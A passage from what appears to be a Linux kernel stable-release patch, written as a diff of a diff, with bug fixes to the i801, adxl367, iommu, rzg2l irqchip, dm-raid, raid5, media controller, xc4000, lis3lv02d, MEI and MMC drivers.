+ 	gpiod_add_lookup_table(lookup);
+-	priv->lookup = lookup;
+ 
+ 	/*
+ 	 * Register the mux device, we use PLATFORM_DEVID_NONE here
+@@ -1436,7 +1435,10 @@ static void i801_add_mux(struct i801_priv *priv)
+ 				sizeof(struct i2c_mux_gpio_platform_data));
+ 	if (IS_ERR(priv->mux_pdev)) {
+ 		gpiod_remove_lookup_table(lookup);
++		devm_kfree(dev, lookup);
+ 		dev_err(dev, "Failed to register i2c-mux-gpio device\n");
++	} else {
++		priv->lookup = lookup;
+ 	}
+ }
+ 
+diff --git a/drivers/iio/accel/adxl367.c b/drivers/iio/accel/adxl367.c
+index 7c7d780407937..f1a41b92543af 100644
+--- a/drivers/iio/accel/adxl367.c
++++ b/drivers/iio/accel/adxl367.c
+@@ -1444,9 +1444,11 @@ static int adxl367_verify_devid(struct adxl367_state *st)
+ 	unsigned int val;
+ 	int ret;
+ 
+-	ret = regmap_read_poll_timeout(st->regmap, ADXL367_REG_DEVID, val,
+-				       val == ADXL367_DEVID_AD, 1000, 10000);
++	ret = regmap_read(st->regmap, ADXL367_REG_DEVID, &val);
+ 	if (ret)
++		return dev_err_probe(st->dev, ret, "Failed to read dev id\n");
++
++	if (val != ADXL367_DEVID_AD)
+ 		return dev_err_probe(st->dev, -ENODEV,
+ 				     "Invalid dev id 0x%02X, expected 0x%02X\n",
+ 				     val, ADXL367_DEVID_AD);
+@@ -1543,6 +1545,8 @@ int adxl367_probe(struct device *dev, const struct adxl367_ops *ops,
+ 	if (ret)
+ 		return ret;
+ 
++	fsleep(15000);
++
+ 	ret = adxl367_verify_devid(st);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/iio/accel/adxl367_i2c.c b/drivers/iio/accel/adxl367_i2c.c
+index 3606efa25835e..5c040915276d1 100644
+--- a/drivers/iio/accel/adxl367_i2c.c
++++ b/drivers/iio/accel/adxl367_i2c.c
+@@ -11,7 +11,7 @@
+ 
+ #include "adxl367.h"
+ 
+-#define ADXL367_I2C_FIFO_DATA	0x42
++#define ADXL367_I2C_FIFO_DATA	0x18
+ 
+ struct adxl367_i2c_state {
+ 	struct regmap *regmap;
+diff --git a/drivers/iommu/dma-iommu.c b/drivers/iommu/dma-iommu.c
+index aa6d62cc567ae..3fa66dba0a326 100644
+--- a/drivers/iommu/dma-iommu.c
++++ b/drivers/iommu/dma-iommu.c
+@@ -1547,6 +1547,14 @@ static size_t iommu_dma_opt_mapping_size(void)
+ 	return iova_rcache_range();
+ }
+ 
++static size_t iommu_dma_max_mapping_size(struct device *dev)
++{
++	if (dev_is_untrusted(dev))
++		return swiotlb_max_mapping_size(dev);
++
++	return SIZE_MAX;
++}
++
+ static const struct dma_map_ops iommu_dma_ops = {
+ 	.flags			= DMA_F_PCI_P2PDMA_SUPPORTED,
+ 	.alloc			= iommu_dma_alloc,
+@@ -1569,6 +1577,7 @@ static const struct dma_map_ops iommu_dma_ops = {
+ 	.unmap_resource		= iommu_dma_unmap_resource,
+ 	.get_merge_boundary	= iommu_dma_get_merge_boundary,
+ 	.opt_mapping_size	= iommu_dma_opt_mapping_size,
++	.max_mapping_size       = iommu_dma_max_mapping_size,
+ };
+ 
+ /*
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 8b38972394776..83736824f17d1 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -1741,6 +1741,9 @@ static void probe_alloc_default_domain(struct bus_type *bus,
+ {
+ 	struct __group_domain_type gtype;
+ 
++	if (group->default_domain)
++		return;
++
+ 	memset(&gtype, 0, sizeof(gtype));
+ 
+ 	/* Ask for default domain requirements of all devices in the group */
+diff --git a/drivers/irqchip/irq-renesas-rzg2l.c b/drivers/irqchip/irq-renesas-rzg2l.c
+index 10c3e85c90c23..be71459c7465a 100644
+--- a/drivers/irqchip/irq-renesas-rzg2l.c
++++ b/drivers/irqchip/irq-renesas-rzg2l.c
+@@ -28,8 +28,7 @@
+ #define ISCR				0x10
+ #define IITSR				0x14
+ #define TSCR				0x20
+-#define TITSR0				0x24
+-#define TITSR1				0x28
++#define TITSR(n)			(0x24 + (n) * 4)
+ #define TITSR0_MAX_INT			16
+ #define TITSEL_WIDTH			0x2
+ #define TSSR(n)				(0x30 + ((n) * 4))
+@@ -67,28 +66,43 @@ static struct rzg2l_irqc_priv *irq_data_to_priv(struct irq_data *data)
+ 	return data->domain->host_data;
+ }
+ 
+-static void rzg2l_irq_eoi(struct irq_data *d)
++static void rzg2l_clear_irq_int(struct rzg2l_irqc_priv *priv, unsigned int hwirq)
+ {
+-	unsigned int hw_irq = irqd_to_hwirq(d) - IRQC_IRQ_START;
+-	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
++	unsigned int hw_irq = hwirq - IRQC_IRQ_START;
+ 	u32 bit = BIT(hw_irq);
+-	u32 reg;
++	u32 iitsr, iscr;
+ 
+-	reg = readl_relaxed(priv->base + ISCR);
+-	if (reg & bit)
+-		writel_relaxed(reg & ~bit, priv->base + ISCR);
++	iscr = readl_relaxed(priv->base + ISCR);
++	iitsr = readl_relaxed(priv->base + IITSR);
++
++	/*
++	 * ISCR can only be cleared if the type is falling-edge, rising-edge or
++	 * falling/rising-edge.
++	 */
++	if ((iscr & bit) && (iitsr & IITSR_IITSEL_MASK(hw_irq))) {
++		writel_relaxed(iscr & ~bit, priv->base + ISCR);
++		/*
++		 * Enforce that the posted write is flushed to prevent that the
++		 * just handled interrupt is raised again.
++		 */
++		readl_relaxed(priv->base + ISCR);
++	}
+ }
+ 
+-static void rzg2l_tint_eoi(struct irq_data *d)
++static void rzg2l_clear_tint_int(struct rzg2l_irqc_priv *priv, unsigned int hwirq)
+ {
+-	unsigned int hw_irq = irqd_to_hwirq(d) - IRQC_TINT_START;
+-	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
+-	u32 bit = BIT(hw_irq);
++	u32 bit = BIT(hwirq - IRQC_TINT_START);
+ 	u32 reg;
+ 
+ 	reg = readl_relaxed(priv->base + TSCR);
+-	if (reg & bit)
++	if (reg & bit) {
+ 		writel_relaxed(reg & ~bit, priv->base + TSCR);
++		/*
++		 * Enforce that the posted write is flushed to prevent that the
++		 * just handled interrupt is raised again.
++		 */
++		readl_relaxed(priv->base + TSCR);
++	}
+ }
+ 
+ static void rzg2l_irqc_eoi(struct irq_data *d)
+@@ -98,9 +112,9 @@ static void rzg2l_irqc_eoi(struct irq_data *d)
+ 
+ 	raw_spin_lock(&priv->lock);
+ 	if (hw_irq >= IRQC_IRQ_START && hw_irq <= IRQC_IRQ_COUNT)
+-		rzg2l_irq_eoi(d);
++		rzg2l_clear_irq_int(priv, hw_irq);
+ 	else if (hw_irq >= IRQC_TINT_START && hw_irq < IRQC_NUM_IRQ)
+-		rzg2l_tint_eoi(d);
++		rzg2l_clear_tint_int(priv, hw_irq);
+ 	raw_spin_unlock(&priv->lock);
+ 	irq_chip_eoi_parent(d);
+ }
+@@ -148,8 +162,10 @@ static void rzg2l_irqc_irq_enable(struct irq_data *d)
+ 
+ static int rzg2l_irq_set_type(struct irq_data *d, unsigned int type)
+ {
+-	unsigned int hw_irq = irqd_to_hwirq(d) - IRQC_IRQ_START;
+ 	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
++	unsigned int hwirq = irqd_to_hwirq(d);
++	u32 iitseln = hwirq - IRQC_IRQ_START;
++	bool clear_irq_int = false;
+ 	u16 sense, tmp;
+ 
+ 	switch (type & IRQ_TYPE_SENSE_MASK) {
+@@ -159,14 +175,17 @@ static int rzg2l_irq_set_type(struct irq_data *d, unsigned int type)
+ 
+ 	case IRQ_TYPE_EDGE_FALLING:
+ 		sense = IITSR_IITSEL_EDGE_FALLING;
++		clear_irq_int = true;
+ 		break;
+ 
+ 	case IRQ_TYPE_EDGE_RISING:
+ 		sense = IITSR_IITSEL_EDGE_RISING;
++		clear_irq_int = true;
+ 		break;
+ 
+ 	case IRQ_TYPE_EDGE_BOTH:
+ 		sense = IITSR_IITSEL_EDGE_BOTH;
++		clear_irq_int = true;
+ 		break;
+ 
+ 	default:
+@@ -175,22 +194,40 @@ static int rzg2l_irq_set_type(struct irq_data *d, unsigned int type)
+ 
+ 	raw_spin_lock(&priv->lock);
+ 	tmp = readl_relaxed(priv->base + IITSR);
+-	tmp &= ~IITSR_IITSEL_MASK(hw_irq);
+-	tmp |= IITSR_IITSEL(hw_irq, sense);
++	tmp &= ~IITSR_IITSEL_MASK(iitseln);
++	tmp |= IITSR_IITSEL(iitseln, sense);
++	if (clear_irq_int)
++		rzg2l_clear_irq_int(priv, hwirq);
+ 	writel_relaxed(tmp, priv->base + IITSR);
+ 	raw_spin_unlock(&priv->lock);
+ 
+ 	return 0;
+ }
+ 
++static u32 rzg2l_disable_tint_and_set_tint_source(struct irq_data *d, struct rzg2l_irqc_priv *priv,
++						  u32 reg, u32 tssr_offset, u8 tssr_index)
++{
++	u32 tint = (u32)(uintptr_t)irq_data_get_irq_chip_data(d);
++	u32 tien = reg & (TIEN << TSSEL_SHIFT(tssr_offset));
++
++	/* Clear the relevant byte in reg */
++	reg &= ~(TSSEL_MASK << TSSEL_SHIFT(tssr_offset));
++	/* Set TINT and leave TIEN clear */
++	reg |= tint << TSSEL_SHIFT(tssr_offset);
++	writel_relaxed(reg, priv->base + TSSR(tssr_index));
++
++	return reg | tien;
++}
++
+ static int rzg2l_tint_set_edge(struct irq_data *d, unsigned int type)
+ {
+ 	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
+ 	unsigned int hwirq = irqd_to_hwirq(d);
+ 	u32 titseln = hwirq - IRQC_TINT_START;
+-	u32 offset;
+-	u8 sense;
+-	u32 reg;
++	u32 tssr_offset = TSSR_OFFSET(titseln);
++	u8 tssr_index = TSSR_INDEX(titseln);
++	u8 index, sense;
++	u32 reg, tssr;
+ 
+ 	switch (type & IRQ_TYPE_SENSE_MASK) {
+ 	case IRQ_TYPE_EDGE_RISING:
+@@ -205,17 +242,21 @@ static int rzg2l_tint_set_edge(struct irq_data *d, unsigned int type)
+ 		return -EINVAL;
+ 	}
+ 
+-	offset = TITSR0;
++	index = 0;
+ 	if (titseln >= TITSR0_MAX_INT) {
+ 		titseln -= TITSR0_MAX_INT;
+-		offset = TITSR1;
++		index = 1;
+ 	}
+ 
+ 	raw_spin_lock(&priv->lock);
+-	reg = readl_relaxed(priv->base + offset);
++	tssr = readl_relaxed(priv->base + TSSR(tssr_index));
++	tssr = rzg2l_disable_tint_and_set_tint_source(d, priv, tssr, tssr_offset, tssr_index);
++	reg = readl_relaxed(priv->base + TITSR(index));
+ 	reg &= ~(IRQ_MASK << (titseln * TITSEL_WIDTH));
+ 	reg |= sense << (titseln * TITSEL_WIDTH);
+-	writel_relaxed(reg, priv->base + offset);
++	writel_relaxed(reg, priv->base + TITSR(index));
++	rzg2l_clear_tint_int(priv, hwirq);
++	writel_relaxed(tssr, priv->base + TSSR(tssr_index));
+ 	raw_spin_unlock(&priv->lock);
+ 
+ 	return 0;
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index bf833ca880bc1..99b4738e867a8 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -4046,7 +4046,9 @@ static void raid_resume(struct dm_target *ti)
+ 		 * Take this opportunity to check whether any failed
+ 		 * devices are reachable again.
+ 		 */
++		mddev_lock_nointr(mddev);
+ 		attempt_restore_of_faulty_devices(rs);
++		mddev_unlock(mddev);
+ 	}
+ 
+ 	if (test_and_clear_bit(RT_FLAG_RS_SUSPENDED, &rs->runtime_flags)) {
+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index b748901a4fb55..1c601508ce0b4 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -679,8 +679,10 @@ static void dm_exception_table_exit(struct dm_exception_table *et,
+ 	for (i = 0; i < size; i++) {
+ 		slot = et->table + i;
+ 
+-		hlist_bl_for_each_entry_safe(ex, pos, n, slot, hash_list)
++		hlist_bl_for_each_entry_safe(ex, pos, n, slot, hash_list) {
+ 			kmem_cache_free(mem, ex);
++			cond_resched();
++		}
+ 	}
+ 
+ 	kvfree(et->table);
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index e4564ca1f2434..8cf2317857e0a 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -2420,7 +2420,7 @@ static int grow_one_stripe(struct r5conf *conf, gfp_t gfp)
+ 	atomic_inc(&conf->active_stripes);
+ 
+ 	raid5_release_stripe(sh);
+-	conf->max_nr_stripes++;
++	WRITE_ONCE(conf->max_nr_stripes, conf->max_nr_stripes + 1);
+ 	return 1;
+ }
+ 
+@@ -2717,7 +2717,7 @@ static int drop_one_stripe(struct r5conf *conf)
+ 	shrink_buffers(sh);
+ 	free_stripe(conf->slab_cache, sh);
+ 	atomic_dec(&conf->active_stripes);
+-	conf->max_nr_stripes--;
++	WRITE_ONCE(conf->max_nr_stripes, conf->max_nr_stripes - 1);
+ 	return 1;
+ }
+ 
+@@ -6891,7 +6891,7 @@ raid5_set_cache_size(struct mddev *mddev, int size)
+ 	if (size <= 16 || size > 32768)
+ 		return -EINVAL;
+ 
+-	conf->min_nr_stripes = size;
++	WRITE_ONCE(conf->min_nr_stripes, size);
+ 	mutex_lock(&conf->cache_size_mutex);
+ 	while (size < conf->max_nr_stripes &&
+ 	       drop_one_stripe(conf))
+@@ -6903,7 +6903,7 @@ raid5_set_cache_size(struct mddev *mddev, int size)
+ 	mutex_lock(&conf->cache_size_mutex);
+ 	while (size > conf->max_nr_stripes)
+ 		if (!grow_one_stripe(conf, GFP_KERNEL)) {
+-			conf->min_nr_stripes = conf->max_nr_stripes;
++			WRITE_ONCE(conf->min_nr_stripes, conf->max_nr_stripes);
+ 			result = -ENOMEM;
+ 			break;
+ 		}
+@@ -7468,11 +7468,13 @@ static unsigned long raid5_cache_count(struct shrinker *shrink,
+ 				       struct shrink_control *sc)
+ {
+ 	struct r5conf *conf = container_of(shrink, struct r5conf, shrinker);
++	int max_stripes = READ_ONCE(conf->max_nr_stripes);
++	int min_stripes = READ_ONCE(conf->min_nr_stripes);
+ 
+-	if (conf->max_nr_stripes < conf->min_nr_stripes)
++	if (max_stripes < min_stripes)
+ 		/* unlikely, but not impossible */
+ 		return 0;
+-	return conf->max_nr_stripes - conf->min_nr_stripes;
++	return max_stripes - min_stripes;
+ }
+ 
+ static struct r5conf *setup_conf(struct mddev *mddev)
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index f268cf66053e1..8919df09e3e8d 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -509,14 +509,15 @@ static int media_pipeline_walk_push(struct media_pipeline_walk *walk,
+ 
+ /*
+  * Move the top entry link cursor to the next link. If all links of the entry
+- * have been visited, pop the entry itself.
++ * have been visited, pop the entry itself. Return true if the entry has been
++ * popped.
+  */
+-static void media_pipeline_walk_pop(struct media_pipeline_walk *walk)
++static bool media_pipeline_walk_pop(struct media_pipeline_walk *walk)
+ {
+ 	struct media_pipeline_walk_entry *entry;
+ 
+ 	if (WARN_ON(walk->stack.top < 0))
+-		return;
++		return false;
+ 
+ 	entry = media_pipeline_walk_top(walk);
+ 
+@@ -526,7 +527,7 @@ static void media_pipeline_walk_pop(struct media_pipeline_walk *walk)
+ 			walk->stack.top);
+ 
+ 		walk->stack.top--;
+-		return;
++		return true;
+ 	}
+ 
+ 	entry->links = entry->links->next;
+@@ -534,6 +535,8 @@ static void media_pipeline_walk_pop(struct media_pipeline_walk *walk)
+ 	dev_dbg(walk->mdev->dev,
+ 		"media pipeline: moved entry %u to next link\n",
+ 		walk->stack.top);
++
++	return false;
+ }
+ 
+ /* Free all memory allocated while walking the pipeline. */
+@@ -579,30 +582,24 @@ static int media_pipeline_explore_next_link(struct media_pipeline *pipe,
+ 					    struct media_pipeline_walk *walk)
+ {
+ 	struct media_pipeline_walk_entry *entry = media_pipeline_walk_top(walk);
+-	struct media_pad *pad;
++	struct media_pad *origin;
+ 	struct media_link *link;
+ 	struct media_pad *local;
+ 	struct media_pad *remote;
++	bool last_link;
+ 	int ret;
+ 
+-	pad = entry->pad;
++	origin = entry->pad;
+ 	link = list_entry(entry->links, typeof(*link), list);
+-	media_pipeline_walk_pop(walk);
++	last_link = media_pipeline_walk_pop(walk);
+ 
+ 	dev_dbg(walk->mdev->dev,
+ 		"media pipeline: exploring link '%s':%u -> '%s':%u\n",
+ 		link->source->entity->name, link->source->index,
+ 		link->sink->entity->name, link->sink->index);
+ 
+-	/* Skip links that are not enabled. */
+-	if (!(link->flags & MEDIA_LNK_FL_ENABLED)) {
+-		dev_dbg(walk->mdev->dev,
+-			"media pipeline: skipping link (disabled)\n");
+-		return 0;
+-	}
+-
+ 	/* Get the local pad and remote pad. */
+-	if (link->source->entity == pad->entity) {
++	if (link->source->entity == origin->entity) {
+ 		local = link->source;
+ 		remote = link->sink;
+ 	} else {
+@@ -614,25 +611,64 @@ static int media_pipeline_explore_next_link(struct media_pipeline *pipe,
+ 	 * Skip links that originate from a different pad than the incoming pad
+ 	 * that is not connected internally in the entity to the incoming pad.
+ 	 */
+-	if (pad != local &&
+-	    !media_entity_has_pad_interdep(pad->entity, pad->index, local->index)) {
++	if (origin != local &&
++	    !media_entity_has_pad_interdep(origin->entity, origin->index,
++					   local->index)) {
+ 		dev_dbg(walk->mdev->dev,
+ 			"media pipeline: skipping link (no route)\n");
+-		return 0;
++		goto done;
+ 	}
+ 
+ 	/*
+-	 * Add the local and remote pads of the link to the pipeline and push
+-	 * them to the stack, if they're not already present.
++	 * Add the local pad of the link to the pipeline and push it to the
++	 * stack, if not already present.
+ 	 */
+ 	ret = media_pipeline_add_pad(pipe, walk, local);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Similarly, add the remote pad, but only if the link is enabled. */
++	if (!(link->flags & MEDIA_LNK_FL_ENABLED)) {
++		dev_dbg(walk->mdev->dev,
++			"media pipeline: skipping link (disabled)\n");
++		goto done;
++	}
++
+ 	ret = media_pipeline_add_pad(pipe, walk, remote);
+ 	if (ret)
+ 		return ret;
+ 
++done:
++	/*
++	 * If we're done iterating over links, iterate over pads of the entity.
++	 * This is necessary to discover pads that are not connected with any
++	 * link. Those are dead ends from a pipeline exploration point of view,
++	 * but are still part of the pipeline and need to be added to enable
++	 * proper validation.
++	 */
++	if (!last_link)
++		return 0;
++
++	dev_dbg(walk->mdev->dev,
++		"media pipeline: adding unconnected pads of '%s'\n",
++		local->entity->name);
++
++	media_entity_for_each_pad(origin->entity, local) {
++		/*
++		 * Skip the origin pad (already handled), pad that have links
++		 * (already discovered through iterating over links) and pads
++		 * not internally connected.
++		 */
++		if (origin == local || !local->num_links ||
++		    !media_entity_has_pad_interdep(origin->entity, origin->index,
++						   local->index))
++			continue;
++
++		ret = media_pipeline_add_pad(pipe, walk, local);
++		if (ret)
++			return ret;
++	}
++
+ 	return 0;
+ }
+ 
+@@ -744,7 +780,6 @@ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 		struct media_pad *pad = ppad->pad;
+ 		struct media_entity *entity = pad->entity;
+ 		bool has_enabled_link = false;
+-		bool has_link = false;
+ 		struct media_link *link;
+ 
+ 		dev_dbg(mdev->dev, "Validating pad '%s':%u\n", pad->entity->name,
+@@ -774,7 +809,6 @@ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 			/* Record if the pad has links and enabled links. */
+ 			if (link->flags & MEDIA_LNK_FL_ENABLED)
+ 				has_enabled_link = true;
+-			has_link = true;
+ 
+ 			/*
+ 			 * Validate the link if it's enabled and has the
+@@ -812,7 +846,7 @@ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 		 * 3. If the pad has the MEDIA_PAD_FL_MUST_CONNECT flag set,
+ 		 * ensure that it has either no link or an enabled link.
+ 		 */
+-		if ((pad->flags & MEDIA_PAD_FL_MUST_CONNECT) && has_link &&
++		if ((pad->flags & MEDIA_PAD_FL_MUST_CONNECT) &&
+ 		    !has_enabled_link) {
+ 			dev_dbg(mdev->dev,
+ 				"Pad '%s':%u must be connected by an enabled link\n",
+@@ -957,6 +991,9 @@ static void __media_entity_remove_link(struct media_entity *entity,
+ 
+ 	/* Remove the reverse links for a data link. */
+ 	if ((link->flags & MEDIA_LNK_FL_LINK_TYPE) == MEDIA_LNK_FL_DATA_LINK) {
++		link->source->num_links--;
++		link->sink->num_links--;
++
+ 		if (link->source->entity == entity)
+ 			remote = link->sink->entity;
+ 		else
+@@ -1017,6 +1054,11 @@ media_create_pad_link(struct media_entity *source, u16 source_pad,
+ 	struct media_link *link;
+ 	struct media_link *backlink;
+ 
++	if (flags & MEDIA_LNK_FL_LINK_TYPE)
++		return -EINVAL;
++
++	flags |= MEDIA_LNK_FL_DATA_LINK;
++
+ 	if (WARN_ON(!source || !sink) ||
+ 	    WARN_ON(source_pad >= source->num_pads) ||
+ 	    WARN_ON(sink_pad >= sink->num_pads))
+@@ -1032,7 +1074,7 @@ media_create_pad_link(struct media_entity *source, u16 source_pad,
+ 
+ 	link->source = &source->pads[source_pad];
+ 	link->sink = &sink->pads[sink_pad];
+-	link->flags = flags & ~MEDIA_LNK_FL_INTERFACE_LINK;
++	link->flags = flags;
+ 
+ 	/* Initialize graph object embedded at the new link */
+ 	media_gobj_create(source->graph_obj.mdev, MEDIA_GRAPH_LINK,
+@@ -1063,6 +1105,9 @@ media_create_pad_link(struct media_entity *source, u16 source_pad,
+ 	sink->num_links++;
+ 	source->num_links++;
+ 
++	link->source->num_links++;
++	link->sink->num_links++;
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(media_create_pad_link);
+diff --git a/drivers/media/tuners/xc4000.c b/drivers/media/tuners/xc4000.c
+index 57ded9ff3f043..29bc63021c5aa 100644
+--- a/drivers/media/tuners/xc4000.c
++++ b/drivers/media/tuners/xc4000.c
+@@ -1515,10 +1515,10 @@ static int xc4000_get_frequency(struct dvb_frontend *fe, u32 *freq)
+ {
+ 	struct xc4000_priv *priv = fe->tuner_priv;
+ 
++	mutex_lock(&priv->lock);
+ 	*freq = priv->freq_hz + priv->freq_offset;
+ 
+ 	if (debug) {
+-		mutex_lock(&priv->lock);
+ 		if ((priv->cur_fw.type
+ 		     & (BASE | FM | DTV6 | DTV7 | DTV78 | DTV8)) == BASE) {
+ 			u16	snr = 0;
+@@ -1529,8 +1529,8 @@ static int xc4000_get_frequency(struct dvb_frontend *fe, u32 *freq)
+ 				return 0;
+ 			}
+ 		}
+-		mutex_unlock(&priv->lock);
+ 	}
++	mutex_unlock(&priv->lock);
+ 
+ 	dprintk(1, "%s()\n", __func__);
+ 
+diff --git a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+index fdec2c30eb165..63c717053e36b 100644
+--- a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
++++ b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+@@ -199,8 +199,14 @@ static int lis3lv02d_i2c_suspend(struct device *dev)
+ 	struct i2c_client *client = to_i2c_client(dev);
+ 	struct lis3lv02d *lis3 = i2c_get_clientdata(client);
+ 
+-	if (!lis3->pdata || !lis3->pdata->wakeup_flags)
++	/* Turn on for wakeup if turned off by runtime suspend */
++	if (lis3->pdata && lis3->pdata->wakeup_flags) {
++		if (pm_runtime_suspended(dev))
++			lis3lv02d_poweron(lis3);
++	/* For non wakeup turn off if not already turned off by runtime suspend */
++	} else if (!pm_runtime_suspended(dev))
+ 		lis3lv02d_poweroff(lis3);
++
+ 	return 0;
+ }
+ 
+@@ -209,13 +215,12 @@ static int lis3lv02d_i2c_resume(struct device *dev)
+ 	struct i2c_client *client = to_i2c_client(dev);
+ 	struct lis3lv02d *lis3 = i2c_get_clientdata(client);
+ 
+-	/*
+-	 * pm_runtime documentation says that devices should always
+-	 * be powered on at resume. Pm_runtime turns them off after system
+-	 * wide resume is complete.
+-	 */
+-	if (!lis3->pdata || !lis3->pdata->wakeup_flags ||
+-		pm_runtime_suspended(dev))
++	/* Turn back off if turned on for wakeup and runtime suspended*/
++	if (lis3->pdata && lis3->pdata->wakeup_flags) {
++		if (pm_runtime_suspended(dev))
++			lis3lv02d_poweroff(lis3);
++	/* For non wakeup turn back on if not runtime suspended */
++	} else if (!pm_runtime_suspended(dev))
+ 		lis3lv02d_poweron(lis3);
+ 
+ 	return 0;
+diff --git a/drivers/misc/mei/hw-me-regs.h b/drivers/misc/mei/hw-me-regs.h
+index bdc65d50b945f..3390ff5111033 100644
+--- a/drivers/misc/mei/hw-me-regs.h
++++ b/drivers/misc/mei/hw-me-regs.h
+@@ -112,6 +112,8 @@
+ #define MEI_DEV_ID_RPL_S      0x7A68  /* Raptor Lake Point S */
+ 
+ #define MEI_DEV_ID_MTL_M      0x7E70  /* Meteor Lake Point M */
++#define MEI_DEV_ID_ARL_S      0x7F68  /* Arrow Lake Point S */
++#define MEI_DEV_ID_ARL_H      0x7770  /* Arrow Lake Point H */
+ 
+ /*
+  * MEI HW Section
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index 5bf0d50d55a00..f8219cbd2c7ce 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -119,6 +119,8 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_CFG)},
+ 
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_MTL_M, MEI_ME_PCH15_CFG)},
++	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_S, MEI_ME_PCH15_CFG)},
++	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_H, MEI_ME_PCH15_CFG)},
+ 
+ 	/* required last entry */
+ 	{0, }
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index ea60efaecb0dd..657772546b6b1 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -415,7 +415,7 @@ static struct mmc_blk_ioc_data *mmc_blk_ioctl_copy_from_user(
+ 	struct mmc_blk_ioc_data *idata;
+ 	int err;
+ 
+-	idata = kmalloc(sizeof(*idata), GFP_KERNEL);
++	idata = kzalloc(sizeof(*idata), GFP_KERNEL);
+ 	if (!idata) {
+ 		err = -ENOMEM;
+ 		goto out;
+@@ -490,7 +490,7 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	if (idata->flags & MMC_BLK_IOC_DROP)
+ 		return 0;
+ 
+-	if (idata->flags & MMC_BLK_IOC_SBC)
++	if (idata->flags & MMC_BLK_IOC_SBC && i > 0)
+ 		prev_idata = idatas[i - 1];
+ 
+ 	/*
+@@ -889,10 +889,11 @@ static const struct block_device_operations mmc_bdops = {
+ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ 				   unsigned int part_type)
+ {
+-	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_MASK;
++	const unsigned int rpmb = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if ((part_type & mask) == mask) {
++	if ((part_type & mask) == rpmb) {
+ 		if (card->ext_csd.cmdq_en) {
+ 			ret = mmc_cmdq_disable(card);
+ 			if (ret)
+@@ -907,10 +908,11 @@ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ static int mmc_blk_part_switch_post(struct mmc_card *card,
+ 				    unsigned int part_type)
+ {
+-	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_MASK;
++	const unsigned int rpmb = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if ((part_type & mask) == mask) {
++	if ((part_type & mask) == rpmb) {
+ 		mmc_retune_unpause(card->host);
+ 		if (card->reenable_cmdq && !card->ext_csd.cmdq_en)
+ 			ret = mmc_cmdq_enable(card);
+diff --git a/drivers/mmc/host/sdhci-omap.c b/drivers/mmc/host/sdhci-omap.c
+index 033be559a7309..bfb7c8b96341c 100644
+--- a/drivers/mmc/host/sdhci-omap.c
++++ b/drivers/mmc/host/sdhci-omap.c
+@@ -1442,6 +1442,9 @@ static int __maybe_unused sdhci_omap_runtime_suspend(struct device *dev)
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_omap_host *omap_host = sdhci_pltfm_priv(pltfm_host);
+ 
++	if (host->tuning_mode != SDHCI_TUNING_MODE_3)
++		mmc_retune_needed(host->mmc);
++
+ 	if (omap_host->con != -EINVAL)
+ 		sdhci_runtime_suspend_host(host);
+ 
+diff --git a/drivers/mmc/host/tmio_mmc_core.c b/drivers/mmc/host/tmio_mmc_core.c
+index 437048bb80273..5024cae411d3a 100644
+--- a/drivers/mmc/host/tmio_mmc_core.c
++++ b/drivers/mmc/host/tmio_mmc_core.c
+@@ -259,6 +259,8 @@ static void tmio_mmc_reset_work(struct work_struct *work)
+ 	else
+ 		mrq->cmd->error = -ETIMEDOUT;
+ 
++	/* No new calls yet, but disallow concurrent tmio_mmc_done_work() */
++	host->mrq = ERR_PTR(-EBUSY);
+ 	host->cmd = NULL;
+ 	host->data = NULL;
+ 
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 0aeac8ccbd0ee..05925fb694602 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
